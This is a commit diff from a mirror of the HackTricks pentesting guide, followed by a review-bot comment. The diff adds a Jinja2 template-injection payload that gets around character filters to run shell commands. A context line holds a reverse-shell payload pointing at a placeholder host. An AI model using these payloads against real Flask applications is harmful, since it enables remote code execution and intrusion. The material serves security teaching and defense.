mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GITBOOK-3792: No subject
This commit is contained in:
parent
c1cccba14b
commit
da094e016f
1 changed files with 10 additions and 0 deletions
|
@ -239,6 +239,16 @@ By default Flask HTML encode all the inside a template for security reasons:
|
|||
{{ config['RUNCMD']('/bin/bash -c "/bin/bash -i >& /dev/tcp/x.x.x.x/8000 0>&1"',shell=True) }}
|
||||
```
|
||||
|
||||
## Without several chars
|
||||
|
||||
Without **`{{` `.` `[` `]` `}}` `_`**
|
||||
|
||||
```python
|
||||
{% raw %}
|
||||
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}
|
||||
{% endraw %}
|
||||
```
|
||||
|
||||
## Jinja Injection without **\<class 'object'>**
|
||||
|
||||
From the [**global objects**](jinja2-ssti.md#accessing-global-objects) there is another way to get to **RCE without using that class.**\
|
||||
|
|
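Review bot: The fence opening the new "Without several chars" block is tagged ```python, but what follows is Jinja template syntax ({% with %} ... {% endwith %} plus {% raw %} guards), so the label is misleading for both readers and highlighters; tag it ```jinja or leave it untagged. The heading "Without {{ . [ ] }} _" also needs one sentence explaining how the restriction is bypassed, because that is the point of the section and the reason it matters to defenders: the payload reaches the same globals through the attr filter with hex-escaped string literals (\x5f\x5f standing in for __) inside {% %} statement tags instead of {{ }} expressions. Stating that explicitly makes clear that a character or keyword blocklist on template input does not reduce the risk, and the section should point at what does (never building a template from user-controlled input, and a restricted rendering environment). Finally, the last added line ends with a trailing backslash and no continuation text; confirm on the rendered page that the "Jinja Injection without <class 'object'>" section actually continues, otherwise the commit leaves a dangling sentence.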